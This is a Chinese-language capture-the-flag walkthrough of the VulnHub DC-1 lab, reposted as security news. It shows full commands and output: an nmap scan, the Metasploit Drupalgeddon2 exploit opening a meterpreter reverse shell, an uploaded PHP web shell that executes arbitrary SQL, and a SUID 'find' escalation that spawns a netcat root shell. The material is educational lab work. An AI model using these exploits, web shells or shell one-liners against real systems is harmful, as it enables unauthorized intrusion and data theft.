【安全新闻】记一次DC-1靶场

这里我来介绍一下我们要如何通关该靶场。

我们需要找个5个flag文件。

  • flag1 在网页根目录。

  • flag2 在网页设置文件。

  • flag3 在后台。

  • flag4 在flag4用户家目录。

  • flag5 在root用户家目录。

下载靶场

  • 下载地址:DC: 1 ~ VulnHub

  • 下载完成以后就解压靶场,然后在VirtualBox导入靶场。

启动靶场

  • 首先先选择DC-1然后点击启动即可。

【安全新闻】记一次DC-1靶场

  • 启动完成。

【安全新闻】记一次DC-1靶场1

收集靶场信息

  • 首先查看网卡。靶场的使用的网卡模式是桥接模式。

  • 使用ip add命令查询到网段地址是192.168.1.63/24

┌──(webb㉿kali)-[~]
└─$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN group default qlen 1000
    link/ether 54:48:10:ee:20:b5 brd ff:ff:ff:ff:ff:ff
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 1c:1b:b5:5f:54:f1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.63/24 brd 192.168.1.255 scope global dynamic noprefixroute wlan0
       valid_lft 75499sec preferred_lft 75499sec
    inet6 fe80::a122:1295:9778:7677/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
  • 从上面的命令查询到了网段地址,接下来我们就需要使用nmap找出虚拟机IP地址。
┌──(webb㉿kali)-[~]
└─$ nmap -v -sn 192.168.1.63/24
...
Nmap scan report for DC-1 (192.168.1.69)
Host is up (0.0011s latency).
...
  • 使用nmap找出靶场的IP接下来我们需要收集靶场开放的端口。还是使用namp
┌──(webb㉿kali)-[~]
└─$ nmap -v -sV -p0-65535 -A 192.168.1.69       
...
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33604/tcp   status
|   100024  1          49960/udp   status
|   100024  1          59480/tcp6  status
|_  100024  1          60315/udp6  status
33604/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
  • 通过上面的命令查询出靶场开放了四个端口。根据端口去查询是否存在有能够利用的漏洞结果如下。
端口 是否有漏洞
22
80
111
33604
  • 靶场使用的Drupal存在SQL注入漏洞刚好msf有利用的脚本。

开始攻击

  • 启动msf。
┌──(webb㉿kali)-[~]
└─$ msfconsole
...
Metasploit tip: Use help <command> to learn more 
about any command

msf6 > 
  • 搜索Drupal的Exp。
msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   ...
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Prop
   ...


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
  • 第一个是我们需要的Exp。
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
  • 显示Exp的选项。
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.63     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
  • 这里我们只需要设置RHOSTS。然后运行。
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.69
rhosts => 192.168.1.69
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 192.168.1.63:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.1.69
[*] Meterpreter session 1 opened (192.168.1.63:4444 -> 192.168.1.69:45404 ) at 2022-03-15 22:19:58 +0800

meterpreter > 

得到第一个flag。

  • 首先查询当前目录。
meterpreter > getwd
/var/www
  • 查询当前目录下的文件。
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-21 04:45:59 +0800  .gitignore
100644/rw-r--r--  5767   fil   2013-11-21 04:45:59 +0800  .htaccess
100644/rw-r--r--  1481   fil   2013-11-21 04:45:59 +0800  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-21 04:45:59 +0800  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-21 04:45:59 +0800  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-21 04:45:59 +0800  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-21 04:45:59 +0800  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 18:14:15 +0800  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-21 04:45:59 +0800  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-21 04:45:59 +0800  README.txt
100644/rw-r--r--  9642   fil   2013-11-21 04:45:59 +0800  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-21 04:45:59 +0800  authorize.php
100644/rw-r--r--  720    fil   2013-11-21 04:45:59 +0800  cron.php
-------------------------------------------------------------------
100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt
-------------------------------------------------------------------
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  includes
100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php
100644/rw-r--r--  703    fil   2013-11-21 04:45:59 +0800  install.php
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  misc
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  modules
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  profiles
100644/rw-r--r--  1561   fil   2013-11-21 04:45:59 +0800  robots.txt
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  scripts
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  sites
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  themes
100644/rw-r--r--  19941  fil   2013-11-21 04:45:59 +0800  update.php
100644/rw-r--r--  2178   fil   2013-11-21 04:45:59 +0800  web.config
100644/rw-r--r--  417    fil   2013-11-21 04:45:59 +0800  xmlrpc.php
  • 发现当前目录下存在flag。查看flag的内容。
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
翻译:每个好的CMS都需要一个配置文件——你也是。

得到第二个flag。

  • 根据第一个flag的提示查找Drupal配置文件。

  • 由于我对Drupal不熟悉,我就利用搜索引擎查找到相关文章。

配置文件目录:sites/default

  • 使用ls命令查询sites/default目录下的文件。
meterpreter > ls sites/default
Listing: sites/default
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  23202  fil   2013-11-21 04:45:59 +0800  default.settings.php
040775/rwxrwxr-x  4096   dir   2019-02-19 21:10:31 +0800  files
100444/r--r--r--  15989  fil   2019-02-19 21:48:01 +0800  settings.php
  • 这里我们需要的settings.php文件。

  • 查看settings.php文件的内容,文件头部就出现了第二个flag。

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */


/**
 *
 * flag2
 * 暴力和字典攻击不是最常见的
 * 只有获得访问权限的方法(你需要访问权限)。
 * 你能用这些证书做什么?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
  • 根据注释提供的信息和下面的数据库链接密码打开可以猜测出flag3应该数据库。

参考链接:Drupal 安装 | Drupal 中文网

得到第三个flag。

  • 根据第二个flag的提示,我们需要使用配置文件的数据库帐号密码去数据库中查询数据。
meterpreter > shell 
Process 3232 created.
Channel 2 created.
mysql -udbuser -p
Enter password: R0ck3t
show databases;
  • 由于这里回显数据太慢。我打算上传一个php连接数据库的文件。

  • 数据库连接代码

<?php
// 创建连接
$conn = new mysqli("localhost", "dbuser", "R0ck3t", "drupaldb");
// 检查链接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

$sql = $_POST["sql"];
$result = $conn->query($sql);
echo "<pre>";
if ($result->num_rows > 0) {
    // 输出数据
    while($row = $result->fetch_assoc()) {
        var_dump($row);
    }
} else {
    echo "null";
}
echo "</pre>";
$conn->close();
?>
  • 上传文件(上传到Drupal根目录)。
meterpreter > upload 1.php shell.php
[*] uploading  : /home/webb/1.php -> shell.php
[*] Uploaded -1.00 B of 423.00 B (-0.24%): /home/webb/1.php -> shell.php
[*] uploaded   : /home/webb/1.php -> shell.php
  • 把下面的内容粘贴到BurpStuite的Repeater模块。
POST /shell.php HTTP/1.1
Host: 192.168.1.69
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Origin: http://192.168.1.69
DNT: 1
Connection: close
Referer: http://192.168.1.69/shell.php
Upgrade-Insecure-Requests: 1

sql=show+tables;
  • 返回的数据。

【安全新闻】记一次DC-1靶场2

  • 处理后的数据。由于这里的表过多不适合一个一个查询。
"actions"
"authmap"
"batch"
"block"
"block_custom"
"block_node_type"
"block_role"
"blocked_ips"
"cache"
"cache_block"
"cache_bootstrap"
"cache_field"
"cache_filter"
"cache_form"
"cache_image"
"cache_menu"
"cache_page"
"cache_path"
"cache_update"
"cache_views"
"cache_views_data"
"comment"
"ctools_css_cache"
"ctools_object_cache"
"date_format_locale"
"date_format_type"
"date_formats"
"field_config"
"field_config_instance"
"field_data_body"
"field_data_comment_body"
"field_data_field_image"
"field_data_field_tags"
"field_revision_body"
"field_revision_comment_body"
"field_revision_field_image"
"field_revision_field_tags"
"file_managed"
"file_usage"
"filter"
"filter_format"
"flood"
"history"
"image_effects"
"image_styles"
"menu_custom"
"menu_links"
"menu_router"
"node"
"node_access"
"node_comment_statistics"
"node_revision"
"node_type"
"queue"
"rdf_mapping"
"registry"
"registry_file"
"role"
"role_permission"
"search_dataset"
"search_index"
"search_node_links"
"search_total"
"semaphore"
"sequences"
"sessions"
"shortcut_set"
"shortcut_set_users"
"system"
"taxonomy_index"
"taxonomy_term_data"
"taxonomy_term_hierarchy"
"taxonomy_vocabulary"
"url_alias"
"users"
"users_roles"
"variable"
"views_display"
"views_view"
"watchdog"
  • 这里我使用python代替手工查询。
import requests

tables = ["actions", "authmap", "batch", "block", "block_custom", "block_node_type", "block_role", "blocked_ips",
          "cache", "cache_block", "cache_bootstrap", "cache_field", "cache_filter", "cache_form", "cache_image",
          "cache_menu", "cache_page", "cache_path", "cache_update", "cache_views", "cache_views_data", "comment",
          "ctools_css_cache", "ctools_object_cache", "date_format_locale", "date_format_type", "date_formats",
          "field_config", "field_config_instance", "field_data_body", "field_data_comment_body",
          "field_data_field_image", "field_data_field_tags", "field_revision_body", "field_revision_comment_body",
          "field_revision_field_image", "field_revision_field_tags", "file_managed", "file_usage", "filter",
          "filter_format", "flood", "history", "image_effects", "image_styles", "menu_custom", "menu_links",
          "menu_router", "node", "node_access", "node_comment_statistics", "node_revision", "node_type", "queue",
          "rdf_mapping", "registry", "registry_file", "role", "role_permission", "search_dataset", "search_index",
          "search_node_links", "search_total", "semaphore", "sequences", "sessions", "shortcut_set",
          "shortcut_set_users", "system", "taxonomy_index", "taxonomy_term_data", "taxonomy_term_hierarchy",
          "taxonomy_vocabulary", "url_alias", "users", "users_roles", "variable", "views_display", "views_view",
          "watchdog"]
for table in tables:
    contents = requests.post("http://192.168.1.69/shell.php", data={"sql": f"select * from {table}"}).text
    if contents.find("flag") != -1:
        print(f"============={table}=================")
        print(contents)
print("===end===")
  • 通过搜索找到第三个flag。

    • 翻译:flag3特殊烫发将有助于找到passwd,但您需要执行该命令,以确定如何获得阴影中的内容

【安全新闻】记一次DC-1靶场3

得到第四个flag。

  • 第三个flag的提示应该是要我们去查看passwdshadow这两个文件。查看这两个文件需要需要权限才可以查看。

  • 查询是否有权限查看passwdshadow

meterpreter > getuid
Server username: www-data
meterpreter > ls /etc/passwd
100644/rw-r--r--  1057  fil  2019-02-19 21:51:25 +0800  /etc/passwd
meterpreter > ls /etc/shadow
100640/rw-r-----  870  fil  2019-02-28 10:10:40 +0800  /etc/shadow
  • 根据上面的结果我们只有查看passwd文件的权限。接下来我们就查看passwd文件内容。
meterpreter > cat /etc/passwd
...
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
  • passwd文件有第四个flag但是没有提示信息,我感觉flag的提示信息应该该flag4用户的家目录。我们可以尝试访问flag4的家目录。
meterpreter > ls /home/flag4
Listing: /home/flag4
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
...
100644/rw-r--r--  125   fil   2019-02-19 21:28:26 +0800  flag4.txt
  • 根据上面的我们可以发现flag4的家目录下有一个flag4.txt文件,打开查看发现我们得到第四个flag。
meterpreter > cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
翻译:您可以使用同样的方法在根目录中查找或访问标志吗?

Probably. But perhaps it's not that easy.  Or maybe it is?
翻译:可能但也许没那么容易。也许是吧?

得到第五个flag。

  • 根据第四个flag的提示第五个flag应该在root用户的家目录。我们尝试查看root用户家目录看看能不能查看。结果是我们没有权限查看。
meterpreter > ls /root
[-] stdapi_fs_ls: Operation failed: 1
  • 由于我们没有权限查询root用户家目录的权限我们只能利用提权。
  • 这里我使用LinEnum.sh收集一下信息。

  • 首先我们需要把LinEnum.sh文件上传上去。

meterpreter > upload LinEnum.sh LinEnum.sh
[*] uploading  : LinEnum.sh -> LinEnum.sh
[*] Uploaded -1.00 B of 45.54 KiB (-0.0%): LinEnum.sh -> LinEnum.sh
[*] uploaded   : LinEnum.sh -> LinEnum.sh
  • 运行LinEnum.sh
meterpreter > shell
Process 3741 created.
Channel 13 created.
bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

...

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find

...
### SCAN COMPLETE ####################################
  • 这里我们使用find命令进行提权。
meterpreter > shell
Process 3741 created.
Channel 13 created.touch dirty
find dirty -exec nc -lvp 9999 -e /bin/sh \; 
listening on [any] 9999 ...
  • 连接反弹shell。
┌──(webb㉿kali)-[~]
└─$ nc 192.168.1.69 9999     
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls
thefinalflag.txt

参考链接:Linux通过第三方应用提权实战总结 – FreeBuf网络安全行业门户

  • 得到第五个flag
cat thefinalflag.txt
Well done!!!!
翻译:做得好!!!!

Hopefully you've enjoyed this and learned some new skills.
翻译:希望你喜欢这个,并学到了一些新技能。

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
翻译:你可以告诉我你对这次小旅行的看法

通过Twitter联系我-@DCAU7
© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论